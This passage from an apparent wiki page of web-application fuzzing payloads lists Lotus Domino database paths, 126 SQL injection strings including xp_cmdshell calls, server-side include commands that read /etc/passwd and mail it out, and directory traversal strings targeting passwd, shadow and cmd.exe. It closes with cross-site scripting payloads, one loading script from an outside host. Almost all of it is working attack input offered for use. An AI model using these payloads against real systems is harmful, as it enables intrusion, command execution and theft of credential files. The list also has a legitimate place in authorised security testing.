/nntp/nd000002.nsf&lt;br /&gt;
/nntp/nd000003.nsf&lt;br /&gt;
/ntsync45.nsf&lt;br /&gt;
/perweb.nsf&lt;br /&gt;
/qpadmin.nsf&lt;br /&gt;
/quickplace/quickplace/main.nsf&lt;br /&gt;
/reports.nsf&lt;br /&gt;
/sample/siregw46.nsf&lt;br /&gt;
/schema50.nsf&lt;br /&gt;
/setupweb.nsf&lt;br /&gt;
/setup.nsf&lt;br /&gt;
/smbcfg.nsf&lt;br /&gt;
/smconf.nsf&lt;br /&gt;
/smency.nsf&lt;br /&gt;
/smhelp.nsf&lt;br /&gt;
/smmsg.nsf&lt;br /&gt;
/smquar.nsf&lt;br /&gt;
/smsolar.nsf&lt;br /&gt;
/smtime.nsf&lt;br /&gt;
/smtpibwq.nsf&lt;br /&gt;
/smtpobwq.nsf&lt;br /&gt;
/smtp.box&lt;br /&gt;
/smtp.nsf&lt;br /&gt;
/smvlog.nsf&lt;br /&gt;
/srvnam.htm&lt;br /&gt;
/statmail.nsf&lt;br /&gt;
/statrep.nsf&lt;br /&gt;
/stauths.nsf&lt;br /&gt;
/stautht.nsf&lt;br /&gt;
/stconfig.nsf&lt;br /&gt;
/stconf.nsf&lt;br /&gt;
/stdnaset.nsf&lt;br /&gt;
/stdomino.nsf&lt;br /&gt;
/stlog.nsf&lt;br /&gt;
/streg.nsf&lt;br /&gt;
/stsrc.nsf&lt;br /&gt;
/userreg.nsf&lt;br /&gt;
/vpuserinfo.nsf&lt;br /&gt;
/webadmin.nsf&lt;br /&gt;
/web.nsf&lt;br /&gt;
/.nsf/../winnt/win.ini&lt;br /&gt;
/?Open &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== SQL Injection -(Update: 11 August 2009 - Total Statements: 126)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;Statement&lt;br /&gt;
'sqlvuln&lt;br /&gt;
'+sqlvuln&lt;br /&gt;
sqlvuln;&lt;br /&gt;
(sqlvuln)&lt;br /&gt;
a' or 1=1--&lt;br /&gt;
&amp;quot;a&amp;quot;&amp;quot; or 1=1--&amp;quot;&lt;br /&gt;
 or a = a&lt;br /&gt;
a' or 'a' = 'a&lt;br /&gt;
1 or 1=1&lt;br /&gt;
a' waitfor delay '0:0:10'--&lt;br /&gt;
1 waitfor delay '0:0:10'--&lt;br /&gt;
declare @q nvarchar (4000) select @q =&lt;br /&gt;
0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A&lt;br /&gt;
0&lt;br /&gt;
031003000270000&lt;br /&gt;
declare @s varchar(22) select @s =&lt;br /&gt;
0x77616974666F722064656C61792027303A303A31302700 exec(@s)&lt;br /&gt;
0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)&lt;br /&gt;
declare @s varchar (8000) select @s = 0x73656c65637420404076657273696f6e&lt;br /&gt;
exec(@s)&lt;br /&gt;
a'&lt;br /&gt;
?&lt;br /&gt;
' or 1=1&lt;br /&gt;
‘ or 1=1 --&lt;br /&gt;
x' AND userid IS NULL; --&lt;br /&gt;
x' AND email IS NULL; --&lt;br /&gt;
anything' OR 'x'='x&lt;br /&gt;
x' AND 1=(SELECT COUNT(*) FROM tabname); --&lt;br /&gt;
x' AND members.email IS NULL; --&lt;br /&gt;
x' OR full_name LIKE '%Bob%&lt;br /&gt;
23 OR 1=1&lt;br /&gt;
'; exec master..xp_cmdshell 'ping 172.10.1.255'--&lt;br /&gt;
'&lt;br /&gt;
'%20or%20''='&lt;br /&gt;
'%20or%20'x'='x&lt;br /&gt;
%20or%20x=x&lt;br /&gt;
')%20or%20('x'='x&lt;br /&gt;
0 or 1=1&lt;br /&gt;
' or 0=0 --&lt;br /&gt;
&amp;quot; or 0=0 --&lt;br /&gt;
or 0=0 --&lt;br /&gt;
' or 0=0 #&lt;br /&gt;
 or 0=0 #&amp;quot;&lt;br /&gt;
or 0=0 #&lt;br /&gt;
' or 1=1--&lt;br /&gt;
&amp;quot; or 1=1--&lt;br /&gt;
' or '1'='1'--&lt;br /&gt;
' or 1 --'&lt;br /&gt;
or 1=1--&lt;br /&gt;
or%201=1&lt;br /&gt;
or%201=1 --&lt;br /&gt;
' or 1=1 or ''='&lt;br /&gt;
 or 1=1 or &amp;quot;&amp;quot;=&lt;br /&gt;
' or a=a--&lt;br /&gt;
 or a=a&lt;br /&gt;
') or ('a'='a&lt;br /&gt;
) or (a=a&lt;br /&gt;
hi or a=a&lt;br /&gt;
hi or 1=1 --&amp;quot;&lt;br /&gt;
hi' or 1=1 --&lt;br /&gt;
hi' or 'a'='a&lt;br /&gt;
hi') or ('a'='a&lt;br /&gt;
&amp;quot;hi&amp;quot;&amp;quot;) or (&amp;quot;&amp;quot;a&amp;quot;&amp;quot;=&amp;quot;&amp;quot;a&amp;quot;&lt;br /&gt;
'hi' or 'x'='x';&lt;br /&gt;
@variable&lt;br /&gt;
,@variable&lt;br /&gt;
PRINT&lt;br /&gt;
PRINT @@variable&lt;br /&gt;
select&lt;br /&gt;
insert&lt;br /&gt;
as&lt;br /&gt;
or&lt;br /&gt;
procedure&lt;br /&gt;
limit&lt;br /&gt;
order by&lt;br /&gt;
asc&lt;br /&gt;
desc&lt;br /&gt;
delete&lt;br /&gt;
update&lt;br /&gt;
distinct&lt;br /&gt;
having&lt;br /&gt;
truncate&lt;br /&gt;
replace&lt;br /&gt;
like&lt;br /&gt;
handler&lt;br /&gt;
bfilename&lt;br /&gt;
' or username like '%&lt;br /&gt;
' or uname like '%&lt;br /&gt;
' or userid like '%&lt;br /&gt;
' or uid like '%&lt;br /&gt;
' or user like '%&lt;br /&gt;
exec xp&lt;br /&gt;
exec sp&lt;br /&gt;
'; exec master..xp_cmdshell&lt;br /&gt;
'; exec xp_regread&lt;br /&gt;
t'exec master..xp_cmdshell 'nslookup www.google.com'--&lt;br /&gt;
--sp_password&lt;br /&gt;
\x27UNION SELECT&lt;br /&gt;
' UNION SELECT&lt;br /&gt;
' UNION ALL SELECT&lt;br /&gt;
' or (EXISTS)&lt;br /&gt;
' (select top 1&lt;br /&gt;
'||UTL_HTTP.REQUEST&lt;br /&gt;
1;SELECT%20*&lt;br /&gt;
to_timestamp_tz&lt;br /&gt;
tz_offset&lt;br /&gt;
&amp;amp;lt;&amp;amp;gt;&amp;quot;'%;)(&amp;amp;amp;+&lt;br /&gt;
'%20or%201=1&lt;br /&gt;
%27%20or%201=1&lt;br /&gt;
%20$(sleep%2050)&lt;br /&gt;
%20'sleep%2050'&lt;br /&gt;
char%4039%41%2b%40SELECT&lt;br /&gt;
&amp;amp;amp;apos;%20OR&lt;br /&gt;
'sqlattempt1&lt;br /&gt;
(sqlattempt2)&lt;br /&gt;
|&lt;br /&gt;
%7C&lt;br /&gt;
*|&lt;br /&gt;
%2A%7C&lt;br /&gt;
*(|(mail=*))&lt;br /&gt;
%2A%28%7C%28mail%3D%2A%29%29&lt;br /&gt;
*(|(objectclass=*))&lt;br /&gt;
%2A%28%7C%28objectclass%3D%2A%29%29&lt;br /&gt;
(&lt;br /&gt;
%28&lt;br /&gt;
)&lt;br /&gt;
%29&lt;br /&gt;
&amp;amp;amp;&lt;br /&gt;
%26&lt;br /&gt;
!&lt;br /&gt;
%21&lt;br /&gt;
' or 1=1 or ''='&lt;br /&gt;
' or ''='&lt;br /&gt;
x' or 1=1 or 'x'='y&lt;br /&gt;
/&lt;br /&gt;
//&lt;br /&gt;
//*&lt;br /&gt;
*/*&lt;br /&gt;
a' or 3=3--&lt;br /&gt;
&amp;quot;a&amp;quot;&amp;quot; or 3=3--&amp;quot;&lt;br /&gt;
' or 3=3&lt;br /&gt;
‘ or 3=3 --&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
=== SSI (Server Side Includes) - (Update: 30 July 2007 - Total Statements: 4)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# Some server side include statements&lt;br /&gt;
# Foobar@email.de&lt;br /&gt;
&lt;br /&gt;
&amp;amp;lt;!--#exec cmd=&amp;quot;/bin/ls /&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;!--#exec cmd=&amp;quot;cat /etc/passwd&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;!--#exec cmd=&amp;quot;find / -name *.* -print&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;!--#exec cmd=&amp;quot;mail Foobar@email.de &amp;amp;lt;mailto:Foobar@email.de&amp;amp;gt; &amp;amp;lt; cat /etc/passwd&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Directory Traversal - (Update: 11 August 2009 - Total Statements: 132)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;Statement&lt;br /&gt;
\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
../../../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../etc/passwd&lt;br /&gt;
../../../../../etc/passwd&lt;br /&gt;
../../../../etc/passwd&lt;br /&gt;
../../../etc/passwd&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
../../../.htaccess&lt;br /&gt;
../../.htaccess&lt;br /&gt;
../.htaccess&lt;br /&gt;
.htaccess&lt;br /&gt;
././.htaccess&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%2f%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%32%66%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
../../../../../../../../../../../../etc/hosts%00&lt;br /&gt;
../../../../../../../../../../../../etc/hosts&lt;br /&gt;
../../boot.ini&lt;br /&gt;
/../../../../../../../../%2A&lt;br /&gt;
../../../../../../../../../../../../etc/passwd%00&lt;br /&gt;
../../../../../../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../../../../../../../etc/shadow%00&lt;br /&gt;
../../../../../../../../../../../../etc/shadow&lt;br /&gt;
/../../../../../../../../../../etc/passwd^^&lt;br /&gt;
/../../../../../../../../../../etc/shadow^^&lt;br /&gt;
/../../../../../../../../../../etc/passwd&lt;br /&gt;
/../../../../../../../../../../etc/shadow&lt;br /&gt;
/./././././././././././etc/passwd&lt;br /&gt;
/./././././././././././etc/shadow&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\passwd&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\shadow&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\etc\passwd&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\etc\shadow&lt;br /&gt;
/..\../..\../..\../..\../..\../..\../etc/passwd&lt;br /&gt;
/..\../..\../..\../..\../..\../..\../etc/shadow&lt;br /&gt;
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd&lt;br /&gt;
.\\./.\\./.\\./.\\./.\\./.\\./etc/shadow&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\passwd%00&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\shadow%00&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\etc\passwd%00&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\etc\shadow%00&lt;br /&gt;
%0a/bin/cat%20/etc/passwd&lt;br /&gt;
%0a/bin/cat%20/etc/shadow&lt;br /&gt;
%00/etc/passwd%00&lt;br /&gt;
%00/etc/shadow%00&lt;br /&gt;
%00../../../../../../etc/passwd&lt;br /&gt;
%00../../../../../../etc/shadow&lt;br /&gt;
/../../../../../../../../../../../etc/passwd%00.jpg&lt;br /&gt;
/../../../../../../../../../../../etc/passwd%00.html&lt;br /&gt;
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd&lt;br /&gt;
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/shadow&lt;br /&gt;
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd&lt;br /&gt;
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shadow&lt;br /&gt;
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00&lt;br /&gt;
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00&lt;br /&gt;
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%&lt;br /&gt;
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..winnt/desktop.ini&lt;br /&gt;
\\&amp;amp;amp;apos;/bin/cat%20/etc/passwd\\&amp;amp;amp;apos;&lt;br /&gt;
\\&amp;amp;amp;apos;/bin/cat%20/etc/shadow\\&amp;amp;amp;apos;&lt;br /&gt;
../../../../../../../../conf/server.xml&lt;br /&gt;
/../../../../../../../../bin/id|&lt;br /&gt;
C:/inetpub/wwwroot/global.asa&lt;br /&gt;
C:\inetpub\wwwroot\global.asa&lt;br /&gt;
C:/boot.ini&lt;br /&gt;
C:\boot.ini&lt;br /&gt;
../../../../../../../../../../../../localstart.asp%00&lt;br /&gt;
../../../../../../../../../../../../localstart.asp&lt;br /&gt;
../../../../../../../../../../../../boot.ini%00&lt;br /&gt;
../../../../../../../../../../../../boot.ini&lt;br /&gt;
/./././././././././././boot.ini&lt;br /&gt;
/../../../../../../../../../../../boot.ini%00&lt;br /&gt;
/../../../../../../../../../../../boot.ini&lt;br /&gt;
/..\../..\../..\../..\../..\../..\../boot.ini&lt;br /&gt;
/.\\./.\\./.\\./.\\./.\\./.\\./boot.ini&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\boot.ini&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\boot.ini%00&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\boot.ini&lt;br /&gt;
/../../../../../../../../../../../boot.ini%00.html&lt;br /&gt;
/../../../../../../../../../../../boot.ini%00.jpg&lt;br /&gt;
/.../.../.../.../.../&lt;br /&gt;
..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../boot.ini&lt;br /&gt;
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
''Sorry for breaking the layout - but &amp;quot;breaking the layout&amp;quot; could become &amp;quot;breaking the software&amp;quot;.'' &lt;br /&gt;
&lt;br /&gt;
=== XSS Discovery Statements ===&lt;br /&gt;
&lt;br /&gt;
Discovery Statements&lt;br /&gt;
&amp;lt;pre&amp;gt;# Discovery Statements (July 2007)&lt;br /&gt;
# Statements used to cause exploitable errors&lt;br /&gt;
# Foobar@email.de&lt;br /&gt;
&lt;br /&gt;
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//&amp;quot;;alert(String.fromCharCode(88,83,83))//\&amp;quot;;alert(String.fromCharCode(88,83,83))//--&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;amp;gt;'&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt; &lt;br /&gt;
'';!--&amp;quot;&amp;amp;lt;XSS&amp;amp;gt;=&amp;amp;amp;{()}&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Common exploit code  &lt;br /&gt;
&amp;lt;pre&amp;gt;# Best Statements (July 2007)&lt;br /&gt;
# Statements covering 90% of all vulnerabilities &lt;br /&gt;
# Foobar@email.de&lt;br /&gt;
&lt;br /&gt;
'&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;img src=&amp;quot;&amp;quot; alt='&lt;br /&gt;
&amp;quot;&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;img src=&amp;quot;&amp;quot; alt=&amp;quot;&lt;br /&gt;
\'&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;img src=&amp;quot;&amp;quot; alt=\'&lt;br /&gt;
'); alert('xss'); var x='&lt;br /&gt;
\\'); alert(\'xss\');var x=\'&lt;br /&gt;
//--&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83));&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
 &lt;br /&gt;
Full List - (Update: 11 August 2009 - Total Statements: 162) &lt;br /&gt;
&amp;lt;pre&amp;gt;# Full List (July 2007)&lt;br /&gt;
# All Statements - Full List &lt;br /&gt;
# Based on the XSS cheat sheet &lt;br /&gt;
# http://ha.ckers.org/xss.html&lt;br /&gt;
# Foobar@email.de&lt;br /&gt;
&lt;br /&gt;
&amp;amp;lt;SCRIPT SRC=http://ha.ckers.org/xss.js&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG SRC=JaVaScRiPt:alert('XSS')&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=javascript:alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=`javascript:alert(&amp;quot;&amp;quot;RSnake says, 'XSS'&amp;quot;&amp;quot;)`&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG &amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG SRC=javascript:alert(String.fromCharCode(88,83,83))&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG SRC=&amp;amp;amp;#0000106&amp;amp;amp;#0000097&amp;amp;amp;#0000118&amp;amp;amp;#0000097&amp;amp;amp;#0000115&amp;amp;amp;#0000099&amp;amp;amp;#0000114&amp;amp;amp;#0000105&amp;amp;amp;#0000112&amp;amp;amp;#0000116&amp;amp;amp;#0000058&amp;amp;amp;#0000097&amp;amp;amp;#0000108&amp;amp;amp;#0000101&amp;amp;amp;#0000114&amp;amp;amp;#0000116&amp;amp;amp;#0000040&amp;amp;amp;#0000039&amp;amp;amp;#0000088&amp;amp;amp;#0000083&amp;amp;amp;#0000083&amp;amp;amp;#0000039&amp;amp;amp;#0000041&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG SRC=&amp;amp;amp;#x6A&amp;amp;amp;#x61&amp;amp;amp;#x76&amp;amp;amp;#x61&amp;amp;amp;#x73&amp;amp;amp;#x63&amp;amp;amp;#x72&amp;amp;amp;#x69&amp;amp;amp;#x70&amp;amp;amp;#x74&amp;amp;amp;#x3A&amp;amp;amp;#x61&amp;amp;amp;#x6C&amp;amp;amp;#x65&amp;amp;amp;#x72&amp;amp;amp;#x74&amp;amp;amp;#x28&amp;amp;amp;#x27&amp;amp;amp;#x58&amp;amp;amp;#x53&amp;amp;amp;#x53&amp;amp;amp;#x27&amp;amp;amp;#x29&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;jav&amp;quot;&lt;br /&gt;
&amp;quot;ascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;perl -e 'print &amp;quot;&amp;quot;&amp;amp;lt;IMG SRC=java\0script:alert(\&amp;quot;&amp;quot;XSS\&amp;quot;&amp;quot;)&amp;amp;gt;&amp;quot;&amp;quot;;' &amp;amp;gt; out&amp;quot;&lt;br /&gt;
